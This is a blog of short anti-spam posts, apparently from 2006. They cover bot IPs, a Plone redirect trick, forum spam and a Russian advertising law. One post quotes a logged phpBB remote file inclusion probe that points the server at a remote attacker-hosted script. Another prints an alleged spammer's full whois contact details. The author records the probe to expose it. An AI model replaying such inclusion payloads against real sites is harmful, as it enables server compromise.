Spamhuntress

McAfee’s site advisor is ranking very high in Google these days. Which means people are likely to check out what they have to say about domains they’re looking for.

Their testing is not always entirely accurate. Take Spamhuntress as an example.

They put one bad mark against my site for linking to a site they classified as bad.

But you can put up comments on sites, whether you own them or not.

That should be a golden opportunity to comment on spamresources. Especially domains we’re likely to see as nameservers for spammy domains. Webhosting and registrars often used by spammers.

Just one caution: If you do comment on other people’s sites, be responsible. Don’t be rude. Don’t get sued for libel. What you write needs to be true at the time of writing, and you’d better be prepared to show evidence of what you write.

I found these in my logs:

208.66.195.1
208.66.195.2
208.66.195.4
208.66.195.6
208.66.195.7
208.66.195.8
208.66.195.11
208.66.195.14
208.66.195.15
208.66.195.21
208.66.195.23

Some are very hungry. We’re talking about a few hundred megabytes between them. And the bot is clueless, as this GET should illustrate:

GET /w/index.php?title=Special:Listadmins&amp%3Blimit=500&amp%3Boffset=0&feed=rss

Project Honeypot determined that this one was most likely a spam harvester. V7n also noticed it’s behavior and recomended blocking.

I found a blog ranking site. Thought it was interesting. Here’s my page on there:

URLFAN

I saw some probing of phpBB in my logs. The probes looked like this:
GET /2006/09/14/includes/functions.php?phpbb_root_path=http://somedomain.tld/oki/lol1.txt?

I couldn’t figure it out. Why would they try probing for phpBB where it obviously couldn’t be found? Then it dawned on me - phpBB was in the URL of a post from that day and from 2006/08/07, which was another URL they tried. I since found another outfit probing for the same vulnerability.

Here’s more on that (as it becomes available):

National Vulnerability Database CVE-2006-4780

The code I found in the files they tried to inject - was not innocent. Let’s just put it like that for the time being.

The site has been down for a while.

I’m sure most of you have already guessed why.

I guess I struck a nerve this last week or so, eh? Definitely an incentive to keep doing exactly what I’m doing.

Spam + Blogs = Trouble

I was tracing a spammer who used plone redirect pages (isn’t every other spammer these days?).

When I found the redirect code, it had this URL in it:

http://www.live.com/?6772716C3529285C6665675B58601F535E5B1C4F5253164A50541457574355530D4144451A4B164B464336

I knew that domain belonged to Microsoft, and I’d already established that the redirect never went anywhere near Microsoft land, so what’s up?

Turns out the javascript throws away everything before the ? and then deobfuscates the numbers. So watch out for redirects that frame innocent domains!

Just to finish what I started:

The redirect is on doorgen.com, and it redirects to canadianpharmanetwork and torontodrugstore, affiliate number 2025.

Here’s the whois:

Seicha Alok Sight (support@doorgen.com)
140-18 rue des Fontinettes
Pas-de-Calais
Pas-de-Calais,62100
FR
Tel. +33.0610720912

This spammer is on 69.31.45.250 and 69.31.45.251 on Pilosoft.

Thanks to Dirk for figuring out the javascript.

Found this:

How to fight SPAM in forums?

Good advice on combatting spam on phpBB forums.  There’s an option to use a captcha for signing up as well, right?

My experience, is that spammers register, then post once. More and more will never bother to post again. So banning isn’t so much the solution as making it difficult for them to register.

Found a link to this post on Digitalpoint:

Plone Exploit that Caused Search Engine Spam is Fixed

Interestingly, I never received any spam for carokee.com. I’ve received plenty of spam for plone pages, though.

Interesting domain name for the blog: spamspotter. But it’s a brand new blog, so we’ll see where they’re headed.

I met Anna Vlasova from Kaspersky labs when I went to Holland for the Spam Symposium earlier this year. She was talking about a new law going into effect this summer, so I asked her for a breakdown. She has allowed me to post her e-mail text here, for all of you to read:

Yes, now we have new version of some law articles (valid from july 2006), but it is not ’spam law’. It regulates advertising process, so it covers only some part of the e-mail spam. But in Russia most of e-mail spam is advertising.

In the latest version of the law, the following points are of crucial importance:

1. The introduction of the concept of ‘advertising distributed via electronic networks’. This means that the law applies to advertising sent via email, and spam which is of an advertising nature will be covered by this law. The word ’spam’ itself is not used in the law.

2. The law also legislates the ‘opt-in’ principle (i.e. preliminary agreement to receive messages, or a subscription to messages).

3. It is assumed that an agreement to receive such messages does not exist, i.e. the originator of a mailing (for instance, a spammer) will have to show that the user agreed to receive advertising. Otherwise the advertising will be viewed as not in accordance with the law.

4. Automatic mailings are prohibited. It’s true that the law talks about prohibiting the use of tools which work ‘without human participation’. In such cases, it will be difficult to demonstrate that spam is sent fully automatically.

Here is a comment on the new law:
http://www.spamtest.ru/document.html?pubid=183916209&context=9562

and here is text of the new law (article 18 covers ‘advertising distributed via electronic networks): http://www.brandfabrica.ru/law/adv/ In russian the title of Article 18 is ‘’Статья 18. Реклама, распространяемая по сетям электросвязи и размещаемая на почтовых отправлениях .